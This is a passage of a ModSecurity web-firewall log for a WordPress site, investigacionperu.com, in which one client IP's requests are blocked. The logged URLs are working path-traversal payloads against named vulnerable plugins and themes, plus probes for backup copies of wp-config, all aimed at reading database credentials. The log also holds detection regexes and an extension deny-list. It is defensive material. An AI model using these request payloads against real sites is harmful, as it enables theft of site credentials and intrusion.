"PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/~wp-config.old"] [unique_id "ZEee5N-GjcOLRjW9Sa4WdQAAAIk"] [Tue Apr 25 04:35:52.057018 2023] [:error] [pid 15580:tid 140447203165952] [client 37.120.213.169:42260] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/_wp-config.bak"] [unique_id "ZEee-N-GjcOLRjW9Sa4WfQAAAIM"] [Tue Apr 25 04:35:59.290424 2023] [:error] [pid 15579:tid 140447049549568] [client 37.120.213.169:42284] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/_wp-config.old"] [unique_id "ZEee_yIlOCjnXl5KlpegngAAAE0"] [Tue Apr 25 04:36:48.761532 2023] [:error] [pid 15580:tid 140447032764160] [client 37.120.213.169:42458] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-license.php?file=..%2F..%2F%2Fwp-config"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-license.php"] [unique_id "ZEefMN-GjcOLRjW9Sa4WkAAAAI8"] [Tue Apr 25 04:36:58.649193 2023] [:error] [pid 15889:tid 140447219951360] [client 37.120.213.169:42490] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.backup"] [unique_id "ZEefOl4G6tVEc6w5Us7hRQAAAME"] [Tue Apr 25 04:36:58.765451 2023] [:error] [pid 15579:tid 140446974015232] [client 37.120.213.169:42492] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".cfg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.cfg"] [unique_id "ZEefOiIlOCjnXl5KlpegtQAAAFY"] [Tue Apr 25 04:37:54.690183 2023] [:error] [pid 15579:tid 140447099905792] [client 37.120.213.169:42698] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php%3A%2F%2Ffilter%2Fresource%3D..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/jsmol2wp/php/jsmol.php"] [unique_id "ZEefciIlOCjnXl5KlpegxgAAAEc"] [Tue Apr 25 04:37:54.806885 2023] [:error] [pid 15579:tid 140447108298496] [client 37.120.213.169:42700] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/simple-image-manipulator/controller/download.php?filepath=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/simple-image-manipulator/controller/download.php"] [unique_id "ZEefciIlOCjnXl5KlpegxwAAAEY"] [Tue Apr 25 04:37:55.652380 2023] [:error] [pid 15579:tid 140447228344064] [client 37.120.213.169:42704] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wpsite-background-takeover/exports/download.php"] [unique_id "ZEefcyIlOCjnXl5KlpegyQAAAEA"] [Tue Apr 25 04:37:59.293017 2023] [:error] [pid 15580:tid 140447194773248] [client 37.120.213.169:42718] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/force-download.php?file=..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/force-download.php"] [unique_id "ZEefd9-GjcOLRjW9Sa4WsQAAAIQ"] [Tue Apr 25 04:38:00.049390 2023] [:error] [pid 15578:tid 140446982407936] [client 37.120.213.169:42722] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /mdocs-posts/?mdocs-img-preview=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/mdocs-posts/"] [unique_id "ZEefeD754oNYNW-15_AYugAAABU"] [Tue Apr 25 04:38:02.299518 2023] [:error] [pid 15578:tid 140447066334976] [client 37.120.213.169:42730] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-filemanager/incl/libfile.php?&path=..%2F..%2F&filename=wp-config.php&action=download"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-filemanager/incl/libfile.php"] [unique_id "ZEefej754oNYNW-15_AYvgAAAAs"] [Tue Apr 25 04:38:03.126083 2023] [:error] [pid 15889:tid 140447007586048] [client 37.120.213.169:42734] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/plugin-newsletter/preview.php?data=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/plugin-newsletter/preview.php"] [unique_id "ZEefe14G6tVEc6w5Us7hdQAAANI"] [Tue Apr 25 04:38:03.242242 2023] [:error] [pid 15580:tid 140447041156864] [client 37.120.213.169:42736] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/simple-download-button-shortcode/simple-download-button_dl.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/simple-download-button-shortcode/simple-download-button_dl.php"] [unique_id "ZEefe9-GjcOLRjW9Sa4WsgAAAI4"] [Tue Apr 25 04:38:03.358894 2023] [:error] [pid 15579:tid 140446982407936] [client 37.120.213.169:42738] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /?mdocs-img-preview=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "ZEefeyIlOCjnXl5KlpegzAAAAFU"] [Tue Apr 25 04:38:04.246506 2023] [:error] [pid 15889:tid 140446982407936] [client 37.120.213.169:42742] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-filemanager/incl/libfile.php?path=..%2F..%2F&filename=wp-config.php&action=download"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-filemanager/incl/libfile.php"] [unique_id "ZEeffF4G6tVEc6w5Us7hdwAAANU"] [Tue Apr 25 04:38:04.364829 2023] [:error] [pid 15889:tid 140447057942272] [client 37.120.213.169:42744] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/twentyeleven/download.php?filename=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/twentyeleven/download.php"] [unique_id "ZEeffF4G6tVEc6w5Us7heAAAAMw"] [Tue Apr 25 04:38:04.486902 2023] [:error] [pid 15889:tid 140447066334976] [client 37.120.213.169:42746] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-includes/plugins/wp-mobile-detector/resize.php?src=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-includes/plugins/wp-mobile-detector/resize.php"] [unique_id "ZEeffF4G6tVEc6w5Us7heQAAAMs"] [Tue Apr 25 04:38:04.603366 2023] [:error] [pid 15578:tid 140447099905792] [client 37.120.213.169:42748] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php"] [unique_id "ZEeffD754oNYNW-15_AYvwAAAAc"] [Tue Apr 25 04:38:04.720017 2023] [:error] [pid 15580:tid 140447211558656] [client 37.120.213.169:42750] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /?mdocs-img-preview=..%2F..%2F..-%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "ZEeffN-GjcOLRjW9Sa4WswAAAII"] [Tue Apr 25 04:38:04.836720 2023] [:error] [pid 15580:tid 140447083120384] [client 37.120.213.169:42752] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /?action=cpis_init&cpis-action=f-download&purchase_id=1&cpis_user_email=i0SECLAB%40intermal.com&f=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "ZEeffN-GjcOLRjW9Sa4WtAAAAIk"] [Tue Apr 25 04:38:04.955981 2023] [:error] [pid 15578:tid 140447203165952] [client 37.120.213.169:42754] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/twentyeleven/download.php?filename=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/twentyeleven/download.php"] [unique_id "ZEeffD754oNYNW-15_AYwAAAAAM"] [Tue Apr 25 04:38:05.083403 2023] [:error] [pid 15578:tid 140447219951360] [client 37.120.213.169:42756] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/thecartpress/modules/Miranda.class.php?page=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/thecartpress/modules/Miranda.class.php"] [unique_id "ZEeffT754oNYNW-15_AYwQAAAAE"] [Tue Apr 25 04:38:05.202646 2023] [:error] [pid 15579:tid 140446990800640] [client 37.120.213.169:42758] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match 